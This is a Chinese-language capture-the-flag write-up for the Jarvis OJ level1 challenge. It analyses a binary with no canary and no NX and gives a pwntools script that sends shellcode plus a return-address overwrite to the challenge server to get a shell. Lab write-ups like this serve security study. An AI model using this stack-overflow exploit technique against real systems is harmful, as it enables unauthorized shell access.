Jarvis OJ - [XMAN]level1 - Writeup

Jarvis OJ - [XMAN]level1 - Writeup

M4x原創，轉載請代表出處http://www.cnblogs.com/WangAoBo/p/7594173.html

題目：

分析

• checksec檢查保護機制以下，NX沒開，能夠經過執行shellcode來get shell

• 拖到IDA中，查看函數的流程，vulnerable_function函數打印了緩衝區的起始地址，read能夠讀取0x100個字符，而buf到ret的偏移爲0x88 + 0x4 < 0x100，而該elf又是No canary found。

  ​

• 整理一下現有的信息：

  • 長度爲0x100的緩衝區
  • 緩衝區的起始地址
  • 沒有打開棧保護和NX保護

  所以，能夠把shellcode填到以buf爲起始地址的緩衝區裏，並控制vulnerable_function返回到shellcode，就能夠經過執行shellcode拿到shell，以下圖

• ​

步驟

• 通過如上分析，寫出exp以下：

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = 'M4x'
 4 
 5 from pwn import *
 6 context(log_level = 'debug', arch = 'i386', os = 'linux')
 7 
 8 shellcode = asm(shellcraft.sh())
 9 #  io = process('./level1')
10 io = remote('pwn2.jarvisoj.com', 9877)
11 text = io.recvline()[14: -2]
12 #  print text[14:-2]
13 buf_addr = int(text, 16)
14 
15 payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
16 io.send(payload)
17 io.interactive()
18 io.close()

 

 

運行exp，拿到flag